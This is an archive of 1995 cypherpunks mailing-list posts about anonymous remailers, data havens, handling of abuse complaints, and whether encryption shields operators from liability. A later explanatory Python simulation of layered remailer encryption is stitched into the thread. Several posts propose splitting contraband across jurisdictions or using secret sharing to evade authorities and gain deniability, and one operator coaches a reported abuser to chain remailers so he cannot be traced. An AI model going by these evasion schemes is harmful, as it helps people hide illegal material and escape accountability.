From: jya at pipeline.com (John Young)
Date: Mon, 16 Jan 95 14:30:25 PST
Subject: US News on Policing Cyberspace
Message-ID: <199501162229.RAA29483@pipe1.pipeline.com>

US News of January 23 has a cover story on "policing cyberspace", another drumbeat about "the growing threats to your privacy and property in the information age."

Not much new for this group except to enjoy another Spielberg gremlin of Jekyll and Hyde cryptography, fearful remailers, slippery digicash, stolen services and personal data, smuggling, terrorism, child pornography, Tennessee BBS, "cybercops" and such.

Featuring the FBI's Kallstrom and Tafoya and FLETC and Financial Fraud Institute and Clipper and protective wiretaps, with supporting roles for Kevin Mitnick, Bruce Schneier, Mike Godwin, Marc Rotenberg, John Perry Barlow, Esther Dyson, Robert Corn-Revere.

And, a cartoon on how to teach parents fear of the Net for their children.

Cypherpunk is not cited, I think, or is it steganoed?

From Jaeson.M.Engle at josaiah.sewanee.edu Mon Jan 16 14:52:49 1995
From: Jaeson.M.Engle at josaiah.sewanee.edu (Rhys Kyraden)
Date: Mon, 16 Jan 95 14:52:49 PST
Subject: Longer than 1048 bit keys
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

I'm using MacPGP 2.6(ui) and noticed that the limit for a key size is the 1048 bit ("military grade" (right)). Is there any way to circumvent this to make larger, harder-to-break-type keys?
TIA,

- -J

(-: aka: :-)
(-: Jaeson M. Engle || jme at josaiah.sewanee.edu :-)
(-: www server: http://josaiah.sewanee.edu/ :-)
(-: It's January 29th! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme at josaiah.sewanee.edu' for my Public :-)
(-: PGP block. :-)

From bdolan at use.usit.net Mon Jan 16 15:03:29 1995
From: bdolan at use.usit.net (Brad Dolan)
Date: Mon, 16 Jan 95 15:03:29 PST
Subject: Another internet story: INFO: NBC Nightly News Tonight (fwd)
Message-ID:

---------- Forwarded message ----------
Date: Mon, 16 Jan 1995 16:44:07 -0500
From: Craig Peterson
To: Multiple recipients of list
Subject: INFO: NBC Nightly News Tonight

A story regarding the Internet, with some sort of mention of NRA.org, should be on the NBC Nightly News with Tom Brokaw tonight.

Craig.

From unicorn at access.digex.net Mon Jan 16 15:06:59 1995
From: unicorn at access.digex.net (Black Unicorn)
Date: Mon, 16 Jan 95 15:06:59 PST
Subject: Another problem w/Data Havens...
In-Reply-To: <9501150445.AA13977@toad.com>
Message-ID:

On Sat, 14 Jan 1995, Robert Rothenberg wrote:

> Date: Sat, 14 Jan 1995 23:45:41 -0500 (EST)
> From: Robert Rothenberg
> To: cypherpunks at toad.com
> Subject: Another problem w/Data Havens...
>
>
> I can see a potential problem with Data Havens (as they've been discussed
> here) that may very well inspire the wrath of the authorities more than
> nuclear secrets or dirty pictures of J.Edgar Hoover...
>
> How does one keep a site from becoming a remote pirated-software exchange
> site? (Esp. since after that MIT case laws may be changed...) It seems that
> such a service could become a magnet for the "elite warez" crowd...
> and even
> if the operator isn't jailed it could lead to a shutdown of the service.
>

Properly formatted, a dispersed multijurisdictional data haven can effectively say "Who cares" to the entirety of your point.

A data haven that mandates encryption for all incoming data will be essentially immune from this sort of problem. The real measure of shutdown will be (on non-privately owned sites) the level of traffic that begins to interfere with other functions of the site.

Data havens that can split data to two or more locations in separate jurisdictions can effectively ignore attention from authorities not related to the site management or site performance. Encryption mandated sites can also take this stance, while encryption is legal in any event.

-uni- (Dark)

--
073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig!

From jrochkin at cs.oberlin.edu Mon Jan 16 16:09:41 1995
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Mon, 16 Jan 95 16:09:41 PST
Subject: Announce: ChainMail 0.6b applescript for using anon remailers
Message-ID:

I've written an applescript for using the cypherpunks-style anon remailers with Eudora for the macintosh. It will take a message in Eudora, and construct a chain with MacPGP for encryption, through remailers you've specified, and then deposit it back in Eudora for sending.

There are still several features I'd like to add to it, but it's quite useable in its present incarnation. You need a scriptable version of MacPGP, scriptable version of Eudora, and some sundry scripting additions which are listed (with URLs) in the docs.

Send email if you'd like a copy, and I'll mail you a binhex'd copy. I don't want it on any archive sites yet, because it's not really done, or fully beta tested for bugs. (so let that be a warning to you, too.)
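
The layering that a chain-building tool like the one announced above has to produce, as an added example; it is not ChainMail's code, which is not shown in this archive. The `::`, `Request-Remailing-To:` and `Encrypted: PGP` header lines are assumed from cypherpunk-style remailer conventions, the addresses and keys are constructed, and a symmetric SHA-256/HMAC construction stands in for MacPGP public-key encryption so the block runs with the standard library only.

```python
import base64
import hashlib
import hmac
import os

# Constructed remailer addresses and keys. A real chain encrypts each layer to
# the remailer's published PGP public key; a shared symmetric key stands in here.
REMAILER_KEYS = {
    "remailer-a@example.org": b"constructed key A",
    "remailer-b@example.org": b"constructed key B",
    "remailer-c@example.org": b"constructed key C",
}


def _subkeys(key):
    """Derive separate encryption and MAC keys from one remailer key."""
    return (hashlib.sha256(b"enc" + key).digest(),
            hashlib.sha256(b"mac" + key).digest())


def _xor_stream(enc_key, nonce, data):
    """XOR data with a SHA-256 counter keystream (stand-in cipher, not PGP)."""
    stream = b""
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(enc_key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def seal(key, plaintext):
    """Encrypt and authenticate one layer; returns a base64 blob."""
    enc_key, mac_key = _subkeys(key)
    nonce = os.urandom(16)
    ct = _xor_stream(enc_key, nonce, plaintext)
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return base64.b64encode(nonce + tag + ct).decode("ascii")


def unseal(key, blob):
    """Verify and decrypt one layer; fails if it was sealed for another hop."""
    enc_key, mac_key = _subkeys(key)
    raw = base64.b64decode(blob)
    nonce, tag, ct = raw[:16], raw[16:48], raw[48:]
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("layer is not addressed to this remailer, or was altered")
    return _xor_stream(enc_key, nonce, ct)


def build_chain(body, recipient, chain):
    """Wrap body innermost-first; returns (first hop, message to send to it)."""
    next_hop, payload = recipient, body
    for hop in reversed(chain):
        inner = "::\nRequest-Remailing-To: %s\n\n%s" % (next_hop, payload)
        payload = "::\nEncrypted: PGP\n\n" + seal(REMAILER_KEYS[hop], inner.encode("utf-8"))
        next_hop = hop
    return next_hop, payload


def remailer_process(name, payload):
    """What one remailer does: strip its layer, learn only the next address."""
    header, _, blob = payload.partition("\n\n")
    if header.split("\n") != ["::", "Encrypted: PGP"]:
        raise ValueError("expected an encrypted remailer block")
    inner = unseal(REMAILER_KEYS[name], blob.strip()).decode("utf-8")
    header, _, rest = inner.partition("\n\n")
    lines = header.split("\n")
    if len(lines) != 2 or lines[0] != "::" or not lines[1].startswith("Request-Remailing-To: "):
        raise ValueError("missing remailing header")
    return lines[1][len("Request-Remailing-To: "):], rest


def relay(first_hop, payload):
    """Pass the message hop to hop; returns (recipient, body, per-hop trace)."""
    hop, trace = first_hop, []
    while hop in REMAILER_KEYS:
        next_hop, payload = remailer_process(hop, payload)
        trace.append((hop, next_hop))
        hop = next_hop
    return hop, payload, trace


if __name__ == "__main__":
    chain = ["remailer-a@example.org", "remailer-b@example.org", "remailer-c@example.org"]
    first, wrapped = build_chain("Constructed test message.", "alice@example.com", chain)
    recipient, body, trace = relay(first, wrapped)
    for hop, nxt in trace:
        print("%s forwards to %s" % (hop, nxt))
    print("delivered to %s: %r" % (recipient, body))
```

Each hop can read only the address of the next hop, which is why an operator in the middle of a chain knows neither the original sender nor the final recipient.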

From grendel at netaxs.com Mon Jan 16 16:48:08 1995
From: grendel at netaxs.com (Michael Handler)
Date: Mon, 16 Jan 95 16:48:08 PST
Subject: request for factorising code
In-Reply-To: <6482.9501161922@exe.dcs.exeter.ac.uk>
Message-ID:

On Mon, 16 Jan 1995 aba at atlas.ex.ac.uk wrote:

> I have code to generate the RSA key pairs and modulus, what I am
> looking for is code to factorise a number using one of the better
> algorithms (quadratic sieve, etc.).

It's been established that the encryption in Netscape is 40 bit RC4, not 40 bit RSA, but if anyone's still looking for the quadratic sieve code, look on Derek Atkins' ftp site toxicwaste.mit.edu. Arjen Lenstra may have made the large number field sieve (LNFS) code available somewhere, but I'm not sure.

--
Michael Handler
Civil Liberty Through Complex Mathematics
Philadelphia, PA
PGP Key ID FC031321 Print: 9B DB 9A B0 1B 0D 56 DA 61 6A 57 AD B2 4C 7B AF
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme

From homer at math.cornell.edu Mon Jan 16 17:27:38 1995
From: homer at math.cornell.edu (Homer Wilson Smith)
Date: Mon, 16 Jan 95 17:27:38 PST
Subject: Abuse Complaint out of homer@rahul.net
Message-ID:

Oh, Goody. I get to deal with my first abuse complaint for my remailer.

Seems to me that letting others decide what is or is not abuse without at least being able to see the abuse myself would be wrong, that opens the door to just anyone claiming they were abused and my taking action against the alleged abuser.

Clearly though if some admin of a system considers something an abuse, one can not just blow them off, we are all responsible for responsible use of the net.

Even if this posting came through a chain, this admin is going to try to trace back the chain through the other remailers. So if I give him the remailer it came from, he is going to pester that remailer operator who won't appreciate it.

I will soon be able to install blocking on the To: or From: lines.
Blocking the From lines is hard, because usually abuse comes through other remailers, so I can't just block that. I can however block To: lines if the person is abusing one particular usenet newsgroup or end receiver.

It would seem that if I am going to take action against someone with blocking of some sort, then I have at least a right to see the full posting that is claimed to be abusive.

By the way, rahul.net keeps syslog files world readable which I find to be a security leak, as anyone (specifically the Church of Scientology) could find out who is in communication with me and start to harass them too.

Comments on ethics and diplomatic handling of this would be appreciated.

Homer

From jya at pipeline.com Mon Jan 16 18:17:57 1995
From: jya at pipeline.com (John Young)
Date: Mon, 16 Jan 95 18:17:57 PST
Subject: Economist on EFF
Message-ID: <199501170217.VAA29809@pipe1.pipeline.com>

The Economist of January 14-20 washes EFF's dirty laundry. After recounting Berman's boot and EFF droop, the article concludes:

"That leaves cyberspace's radical libertarians without a voice in Washington. They're probably delighted."

From homer at math.cornell.edu Mon Jan 16 18:22:11 1995
From: homer at math.cornell.edu (Homer Wilson Smith)
Date: Mon, 16 Jan 95 18:22:11 PST
Subject: Abuse and Remailer Ethics
Message-ID:

I am surprised there isn't a widely agreed upon codification of remailer operator ethics for handling abuse cases. Perhaps there is, and I would appreciate someone pointing me to it.

I am not presently on cypherpunks, so please include me in the replies.

Here is the situation.

homer at rahul.net runs with header logging on, it contains, From: To:, Date: and Subject. rahul.net also keeps syslog files for a week, and makes them public to those on rahul.net.

B writes me saying he is the 'admin of a listserv' and complains that someone is abusing his list with postings through my remailer. He wants the name and e-mail of the abuser to 'talk to him personally'.
Clearly I should not give out the name of a remailer user (if I know it) unless ordered to by a court order. Thus his request is, on the surface of it, absurd.

In this case the alleged abuser, A, did not chain his posting so my logs clearly show who it is.

Clearly I am always going to know the To: of an abuse because the complaint comes to me from or about that address.

If the abuser only uses one remailer, then I am clearly going to know the From: line also, as it is right there in the header logs or rahul.net syslog files (same thing.)

If the abuser chains and a complaint comes to me, all I will know about the From: line is that it came from another remailer.

However now that I know his name and e-mail, if I get another complaint about him, and he has wised up and started chaining, I could pass his name onto the prior remailer before mine, and that remailer could do the same, until it came back to the first remailer on the chain who could take action. This however would piss off a lot of remailer operators.

But now what action is appropriate? Well giving A's name to B is out of the question without a court order, right?

Blocking the To: line, namely the abused party, is extreme as that blocks others from posting to that list or group, unless the list or the group wishes to have no anon messages. In which case I probably might consider blocking the end recipient.

Blocking the From: line, will stop all further postings from that person, which is fitting if indeed he is 'abusing' people, but he will merely start posting through other remailers, who will then have to go through the same procedure.

Perhaps there is some justification then for remailer operators sharing blocked From: lines with each other, that might be a good idea.

But who is to decide what is or is not abuse?
Surely I can't let others tell me that they have been abused without even reading the message, I have seen it happen all too often that parties claim they are being abused when they are merely being exposed and rightly so.

On the other hand, since I am responsible for my own little corner of the net, if something happens that I consider abuse, I certainly have a right to put an end to it if I can.

Some questions:

Does any single recipient have the right to demand that they be blocked from all anon messages. I would say yes.

How about demanding blocking anon messages only from some senders? That is harder to implement. If you block the sender, you block ALL his postings, not just to that party. So you would need to block specific From: and To: combinations. This would not work with chaining at all, even if we did share blocking information. So that is out.

Does a list owner have the right to demand blocking to his list, with or without a vote of the list readers? I would say yes.

What about a newsgroup? I would say it takes a vote. Are anon votes allowed? Touchy question that was important at one time on alt.r.scientology.

Anyhow I would guess that the correct action here is to write the offender and let him know a complaint has been registered against him. I would also educate him as to why he was so easily traced and tell him that if he wants to avoid such in the future to start chaining.

However if he is a determined abuser not prone to social embarrassment, then the sharing of blocking among remailer operators might become a very good idea.

I don't know how you seasoned reops feel about abuse, jpunix went out of business for want of an effective way to deal with it. I think part of the answer is in close cooperation.

This might help keep the abuse down, and raise the reputation of reops so that people begin to think of us as responsible service providers rather than anarcho terrorists.
However I am very new to this field, so I may have my head stuck up my ass, and I would like to hear back from you on your ideas.

Homer Wilson Smith
homer at rahul.net

From jcorgan at scruznet.com Mon Jan 16 18:23:31 1995
From: jcorgan at scruznet.com (Johnathan Corgan)
Date: Mon, 16 Jan 95 18:23:31 PST
Subject: Another problem w/Data Havens...
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

>Data havens that can split data to two or more locations in separate
>jurisdictions can effectively ignore attention from authorities not
>related to the site management or site performance. Encryption mandated
>sites can also take this stance, while encryption is legal in any event.

It just occurred to me when reading this another method for ensuring the "I can't tell what's in it" condition with a data haven operator. Why not use a secret sharing system where the contraband data is split into a number of pieces and sent to different havens? It could be argued that the individual pieces are not the same as the whole, and there is absolutely no way the operator could recover the original from a given piece (thus providing plausible deniability.)

Using M by N secret sharing, with M < N, you build in some redundancy in case one of the havens gets shutdown.

Ok, Eric, go ahead and blast your holes in this argument :)

==
Johnathan Corgan "Violence is the last refuge of the incompetent."
jcorgan at scruznet.com -Isaac Asimov

From jrochkin at cs.oberlin.edu Mon Jan 16 19:25:58 1995
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Mon, 16 Jan 95 19:25:58 PST
Subject: Abuse and Remailer Ethics
Message-ID:

At 9:21 PM 01/16/95, Homer Wilson Smith wrote:
[snip]
> Does any single recipient have the right to demand that they be
>blocked from all anon messages. I would say yes.
>
> How about demanding blocking anon messages only from some
>senders? That is harder to implement. If you block the sender, you
>block ALL his postings, not just to that party. So you would need to
>block specific From: and To: combinations. This would not work with
>chaining at all, even if we did share blocking information. So that
>is out.
>
> Does a list owner have the right to demand blocking to his list,
>with or without a vote of the list readers? I would say yes.
>
> What about a newsgroup? I would say it takes a vote. Are anon voites
>allowed? Touchy question that was important at one time on
>alt.r.scientology.

I agree with all of that. Somewhat conditionally with what you say about newsgroups, because while it sounds nice, it would be hard to implement. I'm tempted to say that a newsgroup, by its nature, doesn't have any mechanism for control/government, once created. And as such, doesn't have any way to "decide" not to accept anonymous posts, or posts from a specific user or remailer. So I'm tempted to say "tough luck" to newsgroups that don't like receiving anonymous posts. The alternative is for people interested to create a moderated newsgroup, where of course the moderator could refuse to allow anonymous posts with or without the remailer operators cooperation.
> Anyhow I would guess that the correct action here is to write the >offender and let him know a complaint has been registered against him. >I would also educate him as to why he was so easily traced and tell >him that if he wants to avoid such in the future to start chaining. Yes, I think that is an excellent course of action. > However if he is a determined abuser not prone to social >embarrassment, then the sharing of blocking among remailer operators >might become a very good idea. I'm not so sure about that. It might become necessary, but blocking remailer delivery to a particular address is a _much_ more desirable solution, in my opinion. If a particular person doesn't want to receive anonymous mail, fine. And it might be good to have a mechanism by which he could make those desires known to all remailers, so he doesn't have to do it individually. But if he does want to receive mail from the remailers, I think he's got to receive all mail from the remailers, and not count on the remailer operators to play Identity Detective and try to screen out people he doesn't like. Same with a listserv and the requests of the listserv operator. A newsgroup is, of course, more touchy, because there really _isn't_ a way for "the newsgroup" to decide not to accept anonymous posts. And I'm not really sure there should be. Part of the answer relies on how "independent" your remailer is. If you _were_ to take no action at all to people who complain about "abuse", would you get in trouble? (from school, company, service provider, country). If you would, then you've got to decide if you are willing to take the heat. And you're probably not willing to take the heat for Canter & Siegel to spam the net. So you've got to do what you've got to do.
But, personally, if I ran a remailer on a machine that wasn't subject to political pressure (from school, service provider, whatever), I would never make any effort to cooperate with other operators to track down "offenders", and I'd never exclude any newsgroups from delivery. Because I wouldn't want to play censor and decide what "offense" is worth tracking down, and what isn't. And because even having the _capability_ to track down people is really dangerous, when you get pressure to track down someone you _don't_ want to track down. Much better to say "Can't be done, don't have logs, can't figure out who it was," than to have to admit "well, I've tracked down 5 people in the past month cause someone complained about them." Kind of ruins the point of anon remailers. Best would be to have tracking down be impossible, and it would be close to, if not entirely, impossible if the user took the proper precautions. But even if it's possible, it's probably best not to develop a mechanism to do it. From grendel at netaxs.com Mon Jan 16 19:43:46 1995 From: grendel at netaxs.com (Michael Handler) Date: Mon, 16 Jan 95 19:43:46 PST Subject: Another problem w/Data Havens... In-Reply-To: Message-ID: On Mon, 16 Jan 1995, Johnathan Corgan wrote: > It just occurred to me when reading this another method for ensuring the > "I can't tell what's in it" condition with a data haven operator. Why not > use a secret sharing system where the contraband data is split into a number > of pieces and sent to different havens? Damn it, you beat me to it. :-) [ ... ] > Ok, Eric, go ahead and blast your holes in this argument :) I'm not Eric, but hey. This entire discussion is completely unnecessary. There are ways of removing operator liability without examining the submission at all.
---------- unix3.netaxs.com:/home/grendel 1/511> host bermuda-gw.alter.net bermuda-gw.alter.net has address 137.39.234.130 bermuda-gw.alter.net mail is handled by relay2.UU.NET bermuda-gw.alter.net mail is handled by relay1.UU.NET unix3.netaxs.com:/home/grendel 1/512> ---------- Nicht wahr? Michael From mclow at coyote.csusm.edu Mon Jan 16 19:46:38 1995 From: mclow at coyote.csusm.edu (Marshall Clow) Date: Mon, 16 Jan 95 19:46:38 PST Subject: Another internet story: INFO: NBC Nightly News Tonight (fwd) Message-ID: >A story regarding the Internet, with some sort of mention of NRA.org, >should be on the NBC Nightly News with Tom Brokaw tonight. > It did not play out here on the left bank, probably because of the earthquake in Japan. Maybe tomorrow. -- Marshall From hroller at metronet.com Mon Jan 16 19:53:27 1995 From: hroller at metronet.com (Michael L. Acklin) Date: Mon, 16 Jan 95 19:53:27 PST Subject: Abuse Complaint out of homer@rahul.net In-Reply-To: Message-ID: <0hp6lS$TgAh4077yn@metronet.com> Homer, I am going to have to agree with you on this. A Sysadmin would have to see the messages or data that is supposed to be harassing the complainant. What I say is harassment may be different from what you say it is. Michael L. Acklin ------------>hroller at metronet.com Finger for Pub Key or MIT Key Server PGP Fingerprint: 86 D6 52 87 E4 FD 64 05 63 BA CA AA B8 A9 04 From homer at math.cornell.edu Mon Jan 16 20:12:21 1995 From: homer at math.cornell.edu (Homer Wilson Smith) Date: Mon, 16 Jan 95 20:12:21 PST Subject: Abuse and Remailer Ethics In-Reply-To: Message-ID: OK, I understood all this. I am afraid that if we implement a total no tracing scenario, then remailers will come under heat from the world at large and the governments. Maybe not. Right now, Rahul (a good guy) is implementing syslogs whether I want him to or not, and that isn't about to change. Really I would have to be the owner of my own system in order to do what you are suggesting.
But then that is what got jpunix shut down. No way to deal with complaints, and big time abuses going through his server, right JP? But I see the advantage to total no tracing, I am just not sure all of us are really strong enough yet to implement it and stay in business. Homer From homer at math.cornell.edu Mon Jan 16 20:36:44 1995 From: homer at math.cornell.edu (Homer Wilson Smith) Date: Mon, 16 Jan 95 20:36:44 PST Subject: Remailer Abuse (fwd) Message-ID: Here is the message I sent to both the complainant and the complainee. Homer Dear ..... , I have been contacted by someone complaining about a posting you made through my remailer. They want me to tell them who you are, which ain't going to happen, but at the same time I don't like getting complaints, you understand? Of course I can not tell you who complained any more than I can tell them who you are. But you know where you have been posting using my remailer, right? Now I have no idea if what you posted was really abusive or not, I did not see the posting or postings, and I know a lot of people complain about 'abuse' when really it's just their closed minds being opened up. I was able to 'trace' you because you sent something through my remailer without using chaining. If you had chained I would never know who the posting came from. I was told who it went to and the time, and it's right there in my system's syslogs coming from you. If you chain and use PGP, then I could not have traced you. So read the instructions on chaining and make sure you USE it. You will be a lot safer in the future from complaint attempts than if you don't use chaining. If you have questions on how to chain, ask on alt.privacy.anon-server or read the various helps at many of the remailers. I have reposted this letter to alt.privacy.anon-server without your name and sent a copy to the complainant. I expect not to hear anything more about you, ok?
Homer Wilson Smith System Administrator of Remailer at homer at rahul.net From marko at millcomm.com Mon Jan 16 21:40:34 1995 From: marko at millcomm.com (Mark Oeltjenbruns) Date: Mon, 16 Jan 95 21:40:34 PST Subject: Does encrypted equal safe? Message-ID: > At 10:08 PM 1/11/95 -0800, Eric Hughes wrote: Edited from response on the 'How do I know if its encrypted?' thread to get some points in the clear. >If you can't read it, it's not kiddie-porn *for you*, although it >might be for someone with the key. > So the fact that it's not kiddie-porn *for me* makes it safe *for me* to be transporting or storing for others that know it is kiddie-porn? >Encryption fragments meaning subjectively. A magazine, for example, >has a fixed center of meaning for all who can read the language. A >magazine looks the same to all who look at it. An encrypted file >looks different to those who have the key from those who do not. > But why does the meaning of the data assume to change? If I take my stack of kiddie-porn and put it in a box with a big strong lock on it, in a way physically encrypting it, change the meaning of what I have? I now have a locked box that looks different from my original. >Encrypted data is fundamentally different from paper-and-ink data in >this way. The metaphor of "planting it on somebody" does not apply to >data that the "somebody" can't read. It is fundamentally a different process, but does that make it different from the locking the physical data in a box as above? > >[...] If you can't easily read it, you >can't be expected to have read it. The operator of a data service has >_zero_ motivation to cryptanalyze something. If they happen to apply >a viewer to the file (for whatever reason), they don't _want_ to see >what's inside. > It seems to me that what you are saying is that because the data is in a form that I can't understand, I'm safe from trouble.
Now it seems to me that this is not all that different from changing the form or appearance of physical data and saying I'm not responsible for it. Now think of a remailer: If somebody gave me this box of stuff, stuff that I had no idea of what it was since it was *locked up*, to transport over to location X and I got busted half way there am I safe? Would the argument that I didn't know what it was hold up? I would tend to say no. If the answer was yes, which is what some current arguments seem to indicate, what does that say about responsibility towards spamming or remailing illegal data? Can I say that even though someone is using me to spam or distribute kiddie porn, I have no reason to try and stop it since I don't know what they are doing? If I did take it upon myself to stop the abuse wouldn't I need to analyze the incoming data to stop it? Something I'm not supposed to do. A Data Haven: It is illegal to handle certain items in the physical world. I can get in some trouble if I have kiddie porn or drugs or what not in my possession. This is true, for most things I would guess, even if I was just 'holding it for someone else.' After all, how do I prove that somebody else put illegal articles, encrypted or not, on my 'site' and it didn't actually come from me? Does 'holding it for someone else' type arguments work in net.world better than in the physical world? Once again, current arguments would say yes, it is different and I'm safe to hold onto illegal data since I don't know what it is. Let's see if I got this straight. In my own words, I'm just as responsible for the data I massage as the person I'm doing it for judging by real world parallels, encrypted or not. Now I would hope this is not the case, since being a remailer operator would mean that if somebody starts a spam using my site I would be just as responsible as the person that started it. Having kiddie porn on my DH would be illegal even if I had no idea it was present.
This doesn't sound too good, since many of the uses of my services would be restricted if I wanted to stay 'safe.' After all if I wasn't as responsible for the spam and was safe from harm, or guilt, about what people used my site for I wouldn't care what went through my system, I'm not really supposed to care what people send me right? In fact I may even take pride that my system is being used so much. ;-) But this doesn't seem to be the case, nor in some regards would I hope them to be. Now I'm getting confused. There seems to be some contradictions in some of the above that need to be worked out, or at least explained to me. Some pretty serious legal problems seem to be lurking within. It just doesn't seem as cut and dry to me as the argument that if I don't know what it is I don't have to worry about it. I'm sure others will have some comments to help me sort this out. -Mark ---------- Mark Oeltjenbruns marko at Millcomm.com N0CCQ SnipIt Research Finger for PGP key. From nesta at nesta.pr.mcs.net Mon Jan 16 22:23:57 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Mon, 16 Jan 95 22:23:57 PST Subject: Jude Milhon in WIRED In-Reply-To: <9501160118.AA05350@snark.imsi.com> Message-ID: On Sun, 15 Jan 1995, Perry E. Metzger wrote: > > rishab at dxm.ernet.in says: > > WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter > > member of the cypherpunks - a term that she coined." I didn't even know there > > _was_ a charter. > > Or a Jude Milhon, for that matter. Another example of the continuing > decay of a once proud magazine... > Uhm, this is funny 8) Jude is the patron saint of a losing battle, the one to keep the Internet free, and to fuck with media as much as possible when it brings fun. And the gravy whick dominatrix, all rolled into a few.
she's also a friend so watch it punk 8) From wcs at anchor.ho.att.com Mon Jan 16 23:37:38 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Mon, 16 Jan 95 23:37:38 PST Subject: Abuse Complaint out of homer@rahul.net Message-ID: <9501170734.AA09389@anchor.ho.att.com> Michael wrote, to Homer and the lists > I am going to have to agree with you on this. > A Sysadmin would have to see the messages or data that is > supposed to be harassing the complainant. What I say is harassment > may be different from what you say it is. There's different levels of harassment. For the kind that says 1) "Don't send me any of this junk mail any more", if the recipient wants to define junk mail to the remailer-operator, there's no ethical problem if the operator wants to block remailed mail to the recipient, though it's good form in non-remailer-chain environments for the operator to issue a bouncegram if possible. If the recipient has to pay per byte/message to receive mail, or the amount transmitted is really excessive, then this is certainly something an operator ought to do to avoid problems. (It's potentially bad form for a for-profit operator to cash digicash postage for delivering the messages if he doesn't, at least without a warning in his pricing policy advertisement.) If the operator doesn't want to block remail to an unwilling recipient, the ethical and legal questions become more interesting. The question of whether the "don't bug me" list gets published is also interesting. For the kind of harassment complaint that says 2) "Block all remail to me from this destination", there are implementation issues - can the remailer perform checks like this before doing the header-munging? Is there more security risk? Of course, with chaining, it's a lot less useful.
For the kind of complaint that says 3) "Block all remail to this group of people", there's the question of whether the requester is authorized to request that for the entire group - newsgroups are an especially interesting problem. Julf's remailer blocks posting to some newsgroups, because the readers have done the usual net.poll and decided they'd like him to block it, since lots of the remail was spam. But especially with newsgroups, it's easy for the recipient to trash incoming articles from the remailers. Bill From wcs at anchor.ho.att.com Mon Jan 16 23:44:56 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Mon, 16 Jan 95 23:44:56 PST Subject: Abuse and Remailer Ethics Message-ID: <9501170741.AA09451@anchor.ho.att.com> > OK, I understood all this. I am afraid that if we implement a total > no tracing scenario, then remailers will come under heat from the world at > large and the governments. Maybe not. Right now, Rahul (a good guy) is > implementing syslogs whether I want him to or not, and that isn't about to > change. Really I would have to be the owner of my own system in order to > do what you are suggesting. You can do a good job of anonymous remailing even on a system that keeps email logs, if the system is otherwise trustable. When mail comes in to your remailer, store it in a file (encrypted....). Periodically take the files of stored messages, shuffle them, and mail them out. It's about the same behavior as doing the same from your own box with eavesdroppers on your network, though the traffic levels are a bit different if each remailer operator on rahul.net gets identified separately instead of all the remailers getting lumped together. But if there are multiple remailers on Rahul's machine, and if the syslogs don't log internal mail, you could also forward some of the remailer traffic randomly through other remailer-operators there.
Bill From craig at passport.ca Tue Jan 17 00:09:21 1995 From: craig at passport.ca (Craig Hubley) Date: Tue, 17 Jan 95 00:09:21 PST Subject: FBI and BLACKNET In-Reply-To: Message-ID: > On Wed, 11 Jan 1995, Samuel Kaplin wrote (about FBI interest in BlackNet) > > > I hope they took you someplace nice for lunch...You might want to file a > > FOI request on yourself, just to see how much they censor. ;) They might > > think you're the ringleader, after all the FBI doesn't buy peons lunch. ;) > > For the benefit of myself and the list, how would you go about doing that? Also would be useful to know the equivalent procedures for Canada, UK, etc. Filing such a request would probably get a file opened on you, too, but so what? The more these files fill up with innocent people the more useless they get. Perhaps everyone ought to sign up their granny to receive the Loompanics catalog or 2600, as a way to generate noise. Regarding BlackNet, I am not sure that they are not *run* by the FBI, or NSA, or CIA, MI6, Interpol, or some more mysterious quasi-governmental entity. Such agencies must realize that traffic in secrets is possible, inevitable, and would probably love to put themselves first in line to buy. Think of the value: embarrass rival agencies, identify leaks (if not sources), raise funds for clandestine operations through resale or blackmail, etc. Security agencies have often engaged in smuggling as a form of entrapment, and/or fundraising; Consider Iran-Contra as a recent high-level example. The mandate to trap offenders in a 'sting' also provides a handy alibi to excuse such operations if they are ever exposed. Citizens have no such protections. Even a record of successful dealings with BlackNet would mean little. If it were run by, say, the Nuclear Non-Proliferation Commission, then presumably it would purchase non-nuclear secrets at high prices to build up credibility. When a nuclear secret was offered for sale it would spare no expense to find the source.
In fact the 'highest bidder' for a secret would often be the embarrassed/enraged agency responsible for preventing its leak. At the very least such agencies could be expected to deal secretly with the BlackNets... why search out a secret yourself if you can buy it on the 'open' market? Craig Hubley Business that runs on knowledge Craig Hubley & Associates needs software that runs on the Web craig at passport.ca 416-778-6136 416-778-1965 FAX From danisch at ira.uka.de Tue Jan 17 00:24:16 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Tue, 17 Jan 95 00:24:16 PST Subject: Scientologys Attempts Message-ID: <9501161644.AA06046@elysion.iaks.ira.uka.de> I just had a view into the alt.religion.scientology and alt.clearing.technology newsgroups. There are some messages about a Scientology decision to shut down every internet traffic about Scientology. If the messages are true, Scientology sent rmgroup Control messages to remove the groups. The request to stop the remailers seems to come from the same people... Hadmut From wcs at anchor.ho.att.com Tue Jan 17 00:32:34 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Tue, 17 Jan 95 00:32:34 PST Subject: Another problem w/Data Havens... Message-ID: <9501170829.AA10034@anchor.ho.att.com> Michael wrote: > This entire discussion is completely unnecessary. There are ways > of removing operator liability without examining the submission at all. Liability is a legal issue, not a technical one. (Catchability is a technical issue.) The basic ways to remove liability are to either run your system where the local laws don't object to information storage, or to reduce the operator's involvement to levels that the local legal system will tolerate. The former case is easy, if you can rent computer space in a country with a non-meddling government and good net access (or an easily rentable government :-).) For those of us in the latter situation, the discussion's still useful... 
